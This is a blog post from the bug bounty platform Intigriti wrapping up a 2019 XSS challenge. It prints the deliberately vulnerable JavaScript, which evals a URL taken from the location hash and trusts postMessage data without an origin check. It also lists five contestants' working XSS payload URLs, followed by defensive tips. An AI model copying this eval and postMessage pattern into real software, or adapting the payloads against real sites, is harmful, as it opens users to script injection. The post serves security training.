By Intigriti
May 6, 2019
CHALLENGE: Can you find the XSS? š§ Earn a Burp License, cool swag & private invites! šhttps://t.co/EehqBfFmjA pic.twitter.com/sq8FIYgQOH
ā Intigriti (@intigriti) April 29, 2019
A couple of days ago we released a XSS challenge. A few hours after sending out the tweet, we noticed the success of this. Therefore, we decided to share a blogpost with the lovely community.
<a href="https://poll.fm/10311886" target="_blank" rel="noopener noreferrer">Take Our Poll</a>
For those who still want to try, the challenge is still up! => https://challenge.intigriti.io <=
In case itās not available anymore or you want to host the challenge yourself, you can find the code below.
const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|/gi, "forbidden");
const iframe = document.createElement("iframe"); iframe.src = url; document.body.appendChild(iframe);
iframe.onload = function(){ window.addEventListener("message", executeCtx, false);}
function executeCtx(e) {
if(e.source == iframe.contentWindow){
e.data.location = window.location;
Object.assign(window, e.data);
eval(url);
}
}
We could write an in detail explanation on how to solve this challenge, but we couldnāt do a better job than Dominic and dPhoeniixx. Both researchers shared a well written and very detailed blogpost. You can find the link below.
The @intigriti XSS Challenge is over! Here's a writeup I did explaining my solution and how I got there! https://t.co/075tIcIb39 ā¦ Thanks for the super fun challenge! pic.twitter.com/OnpTM35tne
ā Dominic (@dee__see) May 3, 2019
Wondering how this challenge could be solved via a different way? Take a look at the payloads shared below.
https://challenge.intigriti.io/#data:text/html;var%20text=text;var%20html=html;alert(xss)//;base64,PGh0bWw+PGJvZHkgb25sb2FkPXhzcygpPjxzY3JpcHQ+IGZ1bmN0aW9uIHhzcygpIHsgcGFyZW50LnBvc3RNZXNzYWdlKHsneHNzJzogIm4wdG0zIn0sICcqJyk7IH07IDwvc2NyaXB0Pg==
by n0tm3
https://challenge.intigriti.io/#data:text/html,alert()//%253Csvg/onload=%27top.postMessage(%7B%22text%22:%201%7D,%20%22*%22);top.postMessage(%7B%22html%22:%201%7D,%20%22*%22)%27%253E
by Karel_Origin
https://challenge.intigriti.io/#data:text/html;var%20text=alert%28%29;var%20html;base64,YWE8c3ZnL29ubG9hZD0idG9wLnBvc3RNZXNzYWdlKDAsJyonKSI+11
by terjanq
https://challenge.intigriti.io/#data:text/html,alert(document.domain);//%253csvg%20onload=%22parent.postMessage({text:4,html:1},'*');%22%253e
by daudmalik06
https://challenge.intigriti.io/#data:text/html,alert(document.domain)//%253C%2553cript%253Ewindow.parent.postMessage({text:%22%22,html:%22%22}%2C%20%22*%22)%253C%2F%2553cript%253E
by _zulln
One of the most common mistakes we saw was people executing the alert box inside the iframe. But that is not valid solution because the javascript doesnāt get triggered on challenge.intigriti.io but in the iframe itself (domain = null).
The four tips shared during the challenge:
First tip: āItās all about that base, ābout that baseā.
Second tip: āDefine the undefinedā.
Third tip: āYou donāt need any external resources.ā
Forth tip: āLook for the charset.ā
Instead of blindly using a wordlist of payloads, understand what you are doing. Go through the challenge step by step and make use of the debugger tool built-in your browser.
Do not trust user input. Input validation is the key!
Seeing a message event? Make sure you check the origin?
Avoid the usage of eval().
Do not give up. Patience is key.
A special thanks to @filedescriptor and @edoverflow for hardening our challenge!
Thanks to the community for participating in the challenge and congratulations to the 90 researchers who solved the challenge. A shout-out to the winner fenrir, who won a Burp License, swag package and private invites on our platform.
The XSS Challenge is over! Thank you all for participating. We had a whopping 90 valid submissions but there can only be one winner. Check the video below to discover who's getting a Burp Pro License and an exclusive @intigriti swag package! #HackWithIntigriti #CTF #BugBounty pic.twitter.com/l2tNzYwJGB
ā Intigriti (@intigriti) May 3, 2019
Follow us on twitter and donāt forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.